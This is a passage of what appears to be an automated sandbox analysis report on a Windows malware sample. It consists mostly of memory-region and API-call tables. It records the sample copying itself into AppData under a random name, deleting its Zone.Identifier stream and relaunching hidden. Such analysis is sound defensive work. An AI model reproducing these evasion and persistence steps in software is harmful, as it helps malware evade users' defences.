| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 113.50 KB |
MD5:
e1e61c3cc78ea166684120028b97fc02
SHA1: b088f6483da0b4ebc5b7dd66355c97c91bc1e338 SHA256: 053489532b58188bf6ce8476040c70fcff7c69814b4dc98e1801e1d893160d9c |
|
|
Threads
Thread 0xbf8
41
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\user32.dll, process_name = c:\users\public\119901.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac8 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 | |
| Module | Get Filename | process_name = c:\users\public\119901.exe, file_name_orig = C:\Users\Public\119901.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\OverloadGabriola.exe |
|
1 | |
| File | Create | filename = C:\Users\Public\119901.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\Public\119901.exe, filename = C:\Users\Public\119901.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\Public\119901.exe, process_name = c:\users\public\119901.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Public\119901.exe, type = size |
|
1 | |
| Module | Unmap | process_name = c:\users\public\119901.exe |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Mutex | Create | mutex_name = Global\I705BA84C |
|
1 | |
| Mutex | Create | mutex_name = Global\M705BA84C |
|
1 | |
| Mutex | Release | mutex_name = Global\I705BA84C |
|
1 | |
| System | Get Time | type = Ticks, time = 172880 |
|
1 |
Thread 0x70c
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 173894 |
|
1 |
Thread 0x80c
11
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 174892 |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\, type = file_attributes |
|
1 | |
| File | Move | source_filename = C:\Users\Public\119901.exe, destination_filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe:Zone.Identifier |
|
1 | |
| Process | Create | process_name = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, os_pid = 0x82c, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
Process #6: narrowexisting.exe
28
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:12, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x82c |
| Parent PID | 0xbf4 (c:\users\public\119901.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
83C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00321fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x00342fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0035dfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| 119901.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x005affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x00737fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x0075ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x01ceffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001cf0000 | 0x01cf0000 | 0x020e2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x020f0000 | 0x023befff | Memory Mapped File | Readable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0x83c
28
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\user32.dll, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac8 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Process #7: narrowexisting.exe
54
22
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:13, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x734 |
| Parent PID | 0x82c (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
858
0x
6A0
0x
710
0x
458
0x
75C
0x
730
0x
878
0x
64
0x
89C
0x
898
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002c2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002ddfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0035ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d7fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e7fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| windowsshell.manifest | 0x003e0000 | 0x003e0fff | Memory Mapped File | Readable |
|
|
|
- |
| index.dat | 0x003e0000 | 0x003ebfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| 119901.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0056ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0066ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x007f7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0083ffff | Private Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x00840000 | 0x00847fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x0085ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x01deffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001df0000 | 0x01df0000 | 0x01eeffff | Private Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x01ef0000 | 0x01efbfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000001f00000 | 0x01f00000 | 0x01f00fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001f00000 | 0x01f00000 | 0x01f00fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001f10000 | 0x01f10000 | 0x01f10fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001f60000 | 0x01f60000 | 0x02352fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02360000 | 0x0262efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x0272ffff | Private Memory | Readable, Writable |
|
|
|
- |
| rsaenh.dll | 0x02730000 | 0x0276bfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002730000 | 0x02730000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002730000 | 0x02730000 | 0x0276ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x0286ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x028affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000028b0000 | 0x028b0000 | 0x028b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002a00000 | 0x02a00000 | 0x02afffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02b3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b40000 | 0x02b40000 | 0x02c3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c40000 | 0x02c40000 | 0x02dfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c40000 | 0x02c40000 | 0x02d5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c40000 | 0x02c40000 | 0x02c7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c80000 | 0x02c80000 | 0x02cbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002cc0000 | 0x02cc0000 | 0x02cfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d00000 | 0x02d00000 | 0x02d0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d50000 | 0x02d50000 | 0x02d5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002df0000 | 0x02df0000 | 0x02dfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002e00000 | 0x02e00000 | 0x02efffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002f00000 | 0x02f00000 | 0x02ffffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003000000 | 0x03000000 | 0x030bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000030c0000 | 0x030c0000 | 0x031bffff | Private Memory | Readable, Writable |
|
|
|
- |
| comctl32.dll | 0x73cc0000 | 0x73e5dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x74300000 | 0x7433bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netprofm.dll | 0x74340000 | 0x74399fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshtcpip.dll | 0x74600000 | 0x74604fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
